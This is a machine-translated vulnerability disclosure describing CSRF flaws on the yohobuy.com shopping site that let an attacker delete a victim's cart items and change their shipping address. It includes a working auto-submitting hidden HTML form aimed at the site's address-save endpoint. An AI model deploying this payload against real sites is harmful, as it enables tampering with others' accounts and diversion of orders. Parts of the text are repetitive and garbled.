YOHO! In-stock CSRF, You Can batch Delete others' shopping cart content and modify the shipping address.

YOHO! In-stock CSRF, You Can batch Delete others' shopping cart content and modify the shipping address.

YOHO! It's nice to have the goods, but it's a pity that the year-end prize will not be issued in March.
Here, a csrf is submitted to delete items in others' shopping cart in batches, mainly because there is no token When deleting the items in the shopping cart, and there is no limit on the reffer.

1. Open the kali host and log on with account A. Let's first check whether the data packet in our shopping cart has token or reffer is not limited.
 

OK. There is no token restriction, and the timestamp 1407715543670 can be changed. Id indicates that the range of the shopping cart item within one day is 3555 xxxx (the id of the shopping cart yesterday is 3550 xxxx), which is obviously related to the total amount of new shopping cart added to the whole website every day, we can probably calculate the daily purchase volume.



2. Next, we will create a csrfyohu.html file as follows, and place it on host 172.16.1.htm.

3. A Windows 7 host has logged on to YOHU Account B and accessed http: // 172.16.1.20./ csrfYohu.html to start automatically traversing the shopping cart content of Account B.
 

Shopping Cart before deletion
 

After running for half a minute, I found that one shopping cart was missing! @@!
 

Csrf attack successful





//////////////////////////////

Next, let's take a look at the csrf of the modified address.

The idea is the same as above. First modify the address to capture packets to see if there is a token.

Okay. Place an html file in http: // 172.16.1.20.to fool the victim's click. The content is as follows: Hide the webpage, submit the post, and change the id of the last post parameter randomly. It is useless during the test.

<Form method = 'post' action =' http://www.yohobuy.com/home/address/save '> <Input type = 'text' value = 'month' name = 'sssee _ name' style = 'display: none! Important; display: block; width = 0; height = 0'/> <input type = 'text' value = 'shanghai Center' name = 'address' style = 'display: none! Important; display: block; width = 0; height = 0'/> <input type = 'text' value = '000000' name = 'zip _ Code' style = 'display: none! Important; display: block; width = 0; height = 0'/> <input type = 'text' value = '000000' name = 'phone' style = 'display: none! Important; display: block; width = 0; height = 0'/> <input type = 'text' value = '000000' name = 'mobile' style = 'display: none! Important; display: block; width = 0; height = 0'/> <input type = 'text' value = '[email protected] 'name = 'direct' style = 'display: none! Important; display: block; width = 0; height = 0'/> <input type = 'text' value = '000000' name = 'area _ Code' style = 'display: none! Important; display: block; width = 0; height = 0'/> <input type = 'text' value = '000000' name = 'id' style = 'display: none! Important; display: block; width = 0; height = 0 '/> </form> <script> document. forms [0]. submit (); </script>

 

Verify that urlencode is correctly encoded using python.
 

Csrf address modified successfully
 

 

 

A Windows 7 host has logged on to YOHU's account B and accessed http: // 172.16.1.20./ csrfYohu.html to start automatically traversing the shopping cart content of Account B.
 

Shopping Cart before deletion
 

After running for half a minute, I found that one shopping cart was missing! @@!
 

Csrf address modified successfully
 

 

 

Solution:

Reffer check, or token is introduced, and the verification code is no longer necessary! @@!